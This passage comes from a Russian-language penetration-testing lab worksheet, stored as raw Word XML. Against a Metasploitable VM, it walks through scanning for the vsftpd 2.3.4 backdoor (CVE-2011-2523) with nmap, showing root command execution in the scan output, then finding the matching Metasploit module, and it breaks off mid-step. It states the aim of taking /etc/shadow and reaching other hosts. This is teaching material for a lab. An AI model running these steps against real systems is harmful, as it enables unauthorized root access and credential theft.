        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вы запустите сценарий для проверки уязвимости FTP на виртуальной машине Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>узла 209.165.200.235. Введите следующую команду:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A9BA42" w14:textId="10A2CF00" w:rsidR="004D7F94" w:rsidRPr="005B09D1" w:rsidRDefault="00844A53" w:rsidP="00B12758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root@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:~</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script ftp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-backdoor 209.165.200.235 </w:t>
      </w:r>
      <w:r w:rsidR="00D21F13" w:rsidRPr="00D21F13">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reason &gt; ftpd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496C3CFA" w14:textId="1F2C2FFA" w:rsidR="00633653" w:rsidRDefault="00633653" w:rsidP="00633653">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Результаты перенаправляются</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>сохраняются</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>текстовый файл</w:t>
      </w:r>
      <w:r w:rsidR="0060093C" w:rsidRPr="0060093C">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> ftpd.txt</w:t>
      </w:r>
      <w:r>
        <w:t>. Эта операция займет несколько минут.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5B3FEE" w14:textId="6C6D5956" w:rsidR="002D7A12" w:rsidRDefault="00A20DF3" w:rsidP="002D7A12">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После возвращения приглашения командной строки откройте текстовый файл, содержащий результаты работы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB07204" w14:textId="77777777" w:rsidR="007810A4" w:rsidRDefault="007810A4" w:rsidP="007810A4">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kali:~# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cat ftpd.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3512D44D" w14:textId="480E06CF" w:rsidR="007810A4" w:rsidRDefault="00B12758" w:rsidP="00B12758">
      <w:pPr>
        <w:pStyle w:val="BodyTextL50"/>
      </w:pPr>
      <w:r>
        <w:t>Результаты показывают уязвимость</w:t>
      </w:r>
      <w:r w:rsidR="001D0BC7" w:rsidRPr="00633653">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> vsftpd</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">другие открытые порты, которые обнаружены командой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на виртуальной машине Metasploitable.</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> В </w:t>
      </w:r>
      <w:r>
        <w:t>этой лабораторной работе будет использоваться уязвимость</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">портом 21. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E676770" w14:textId="252798BA" w:rsidR="00B525B7" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
      </w:pPr>
      <w:r>
        <w:t>Starting Nmap 7.40 ( https://nmap.org ) at 2017-07-11 11:34 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CAE89E" w14:textId="77777777" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap scan report for 209.165.200.235</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734AC9C4" w14:textId="100E7021" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Host is up, received echo-reply </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 63 (0.0011s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F0650D" w14:textId="46420A3F" w:rsidR="00F830FB" w:rsidRPr="008855F4" w:rsidRDefault="00F830FB" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Not shown: 977 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74001AD2" w14:textId="77777777" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Reason: 977 resets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC1076B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>PORT     STATE SERVICE      REASON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B46543B" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>open  ftp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">          syn-ack </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 63</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A5CC2" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>| ftp-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-backdoor: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12656BF3" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>|   VULNERABLE:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EB0B37" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">|   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> version 2.3.4 backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A10D3" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="00D12943" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|tate: VULNERABLE (Exploitable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60731BAD" w14:textId="5604524E" w:rsidR="00B525B7" w:rsidRPr="00D12943" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D12943">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|IDs:  OSVDB:73573  CVE:CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF9B635" w14:textId="37470217" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsFTPd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> version 2.3.4 backdoor, this was reported on 2011-07-04.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CFDA7C" w14:textId="3A2805AC" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|Disclosure date: 2011-07-03</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD889B" w14:textId="2C6E5EBE" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|Exploit results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316EA00A" w14:textId="21356EE6" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|Shell command: id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFE71AD" w14:textId="19EC3929" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>|Results: uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5BF614" w14:textId="014D4FAC" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>|References:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FC3D66" w14:textId="0DF6337B" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>|http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC4DB2" w14:textId="3921BFCA" w:rsidR="00B525B7" w:rsidRPr="008855F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="nl-NL"/>
        </w:rPr>
        <w:t>|https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCD5EC3" w14:textId="5EC78003" w:rsidR="00B525B7" w:rsidRPr="001660F4" w:rsidRDefault="00B525B7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>|http://osvdb.org/73573</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9220D" w14:textId="77777777" w:rsidR="001D0BC7" w:rsidRPr="001660F4" w:rsidRDefault="001D0BC7" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001660F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;output omitted&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B8552" w14:textId="3A2CE881" w:rsidR="00346967" w:rsidRDefault="00346967" w:rsidP="0042041D">
      <w:pPr>
        <w:pStyle w:val="PartHead"/>
      </w:pPr>
      <w:r>
        <w:t>Применение эксплойтов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E07341" w14:textId="28BAF4EA" w:rsidR="00054E98" w:rsidRPr="00054E98" w:rsidRDefault="00054E98" w:rsidP="00054E98">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>Теперь, когда вы определили, что можете получить доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">правами root на виртуальную машину Metasploitable, вы будете использовать уязвимость </w:t>
      </w:r>
      <w:r w:rsidR="001A4AC3" w:rsidRPr="00633653">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vsftp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, чтобы получить полный контроль над виртуальной машиной Metasploitable. Вы будете компрометировать файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/etc/shadow</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>сможете получить доступ</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> к </w:t>
      </w:r>
      <w:r>
        <w:t>другим хостам</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73164858" w14:textId="787C66B8" w:rsidR="000D4563" w:rsidRDefault="000D4563" w:rsidP="000D4563">
      <w:pPr>
        <w:pStyle w:val="StepHead"/>
      </w:pPr>
      <w:r>
        <w:t>Настройка эксплойта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DAAC9" w14:textId="5347FB18" w:rsidR="009B339C" w:rsidRPr="009B339C" w:rsidRDefault="009B339C" w:rsidP="009B339C">
      <w:pPr>
        <w:pStyle w:val="BodyTextL25"/>
      </w:pPr>
      <w:r>
        <w:t>На этом этапе вы будете использовать среду Metasploit для запуска эксплойта на виртуальную машину Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">помощью команды </w:t>
      </w:r>
      <w:r w:rsidR="00993ACE" w:rsidRPr="00633653">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:r>
        <w:t>. Платформа Metasploit — инструмент для разработки</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:t>запуска атаки на удаленном целевом хосте. Ее можно также использовать для проверки уязвимости хоста.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E24298" w14:textId="3361E3A4" w:rsidR="009614D2" w:rsidRDefault="00376025" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В командной строке терминала на виртуальной машине Kali введите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для запуска среды Metasploit. Это займет несколько минут.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D66CCF7" w14:textId="1B27EFE7" w:rsidR="00376025" w:rsidRPr="009614D2" w:rsidRDefault="00376025" w:rsidP="00376025">
      <w:pPr>
        <w:pStyle w:val="CMD"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">root@kali:~# </w:t>
      </w:r>
      <w:r w:rsidRPr="00376025">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304402C8" w14:textId="6D7EAE63" w:rsidR="000D4563" w:rsidRDefault="000D4563" w:rsidP="000D4563">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В командной строке </w:t>
      </w:r>
      <w:r w:rsidRPr="00633653">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> введите </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>search vsftpd</w:t>
      </w:r>
      <w:r>
        <w:t>, чтобы найти модуль, который связан</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:t>VSFTPD v2.3.4 backdoor. Вы будете использовать этот модуль для применения эксплойтов. Этот поиск займет несколько минут при сборке базы данных</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:t>первый раз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B83F4" w14:textId="77777777" w:rsidR="002F3B3D" w:rsidRPr="008855F4" w:rsidRDefault="002F3B3D" w:rsidP="002F3B3D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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D64604A" w14:textId="5F217E2B" w:rsidR="00D55621" w:rsidRPr="008855F4" w:rsidRDefault="00E80615" w:rsidP="002F3B3D">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[!] Module database cache not built yet, using slow search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49378BAB" w14:textId="77777777" w:rsidR="000E58A0" w:rsidRPr="008855F4" w:rsidRDefault="000E58A0" w:rsidP="002F3B3D">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4810442E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>Matching Modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33146AAF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>================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D8A7A" w14:textId="77777777" w:rsidR="008855F4" w:rsidRPr="008855F4" w:rsidRDefault="008855F4" w:rsidP="008855F4">
      <w:pPr>
        <w:pStyle w:val="CMDOutput"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C62811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Name                                  Disclosure </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Date  Rank</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D500B3C" w14:textId="7AFBBB0F" w:rsidR="002F3B3D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----                                  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>---------------  ----</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">       -----------</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
      <w:r w:rsidRPr="008855F4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CBED7D" w14:textId="0A37814F" w:rsidR="00A77C27" w:rsidRDefault="00D55621" w:rsidP="00A77C27">
      <w:pPr>
        <w:pStyle w:val="SubStepAlpha"/>
      </w:pPr>
      <w:r>
        <w:t>Итак, обнаружен эксплойт. Введите следующую команду</w:t>
      </w:r>
      <w:r w:rsidR="00BD63E7">
